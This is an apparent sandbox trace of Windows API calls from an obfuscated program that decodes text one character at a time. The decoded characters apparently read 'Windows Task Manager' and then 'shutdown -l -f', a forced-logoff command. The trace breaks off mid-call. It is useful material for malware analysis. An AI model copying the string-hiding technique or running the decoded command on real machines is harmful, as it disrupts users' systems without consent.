MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bl", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0177.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Bl", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=3 | out: lpWideCharStr="Bl") returned 3 [0177.230] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0177.230] VarBstrCmp (bstrLeft="Bl", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0177.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.231] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0177.231] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.239] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0177.239] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.240] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.240] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.241] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0177.242] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.243] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.243] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.244] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.244] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.245] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.246] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.247] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.315] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.316] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0177.316] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.317] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0177.317] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.318] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.318] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.319] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0177.319] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.320] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.320] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.321] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0177.321] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.322] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0177.322] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.322] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.323] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.323] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0177.324] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.324] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0177.325] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.330] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0177.330] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.331] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0177.331] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.332] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.332] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.333] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0177.333] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.334] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0177.334] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.335] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.335] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.336] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0177.336] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.337] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.337] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.338] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.338] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.338] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.339] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.339] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.340] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.340] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.341] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.346] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0177.347] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.347] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.348] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.348] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.349] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.349] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0177.350] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.350] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.351] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.351] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.352] MultiByteToWideChar 